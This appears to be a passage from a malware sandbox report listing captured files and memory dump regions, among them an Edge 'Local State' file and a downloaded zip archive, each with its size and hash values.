f98f61aa31592bd461da8a2154becbba

SHA1
dcd8df813f7c898fb369af35a8593f08a59af3f9

SHA256
ecac508efd2c54e68d60af3aa991f6e7311a820381f703e8daa435ca51812596

SHA512
8e770f568b785a2a5f26b8733436f9410ba9c13e887570d63da2c9ec07ca9ea6f097be8097fae5e0bc3ba89d57cd91452f899c66d818b69cd2af41af2bfc573f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bf508a105b3f54bc93aeaf5a0b51d65c

SHA1
7709a6ead99446452a802ae7a0e0296d944f7602

SHA256
451af7b3c2a275f1e633e52846d50ac09e31240fb9f5ef60cc779fa16e483eca

SHA512
57a5da223eeb7bf3c5b558101c234d400d879b65d15e28ade5cb682e4d08b48d1c0fb1cdafbf1e4064897dc971cf7a9570b0630bba76482200f2614797d077c0

Download Submit
C:\Users\Admin\Downloads\client-20240808T174518Z-001.zip

Filesize
1.0MB

MD5
159407e2479fa29465c891a40d1877e8

SHA1
30d23f41e354d83e904da223fff00a8c85de28b0

SHA256
fc4cd3a90e27f8581a0b18d24ec528f129d3cba9a62f2dba1ba3543c866b1458

SHA512
9c3f551e01dc99db3661ba835c365c1a501a9469f8d6b1e36af08c8ed79088354de46489ec6a72933c616ceb923b62dfb50dac7d8e8658256f0ebb12ece823f3

Download Submit
memory/3336-284-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-279-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-283-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-278-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-289-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-288-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-287-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-286-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-285-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download
memory/3336-277-0x0000016119E10000-0x0000016119E11000-memory.dmp

Filesize
4KB

Download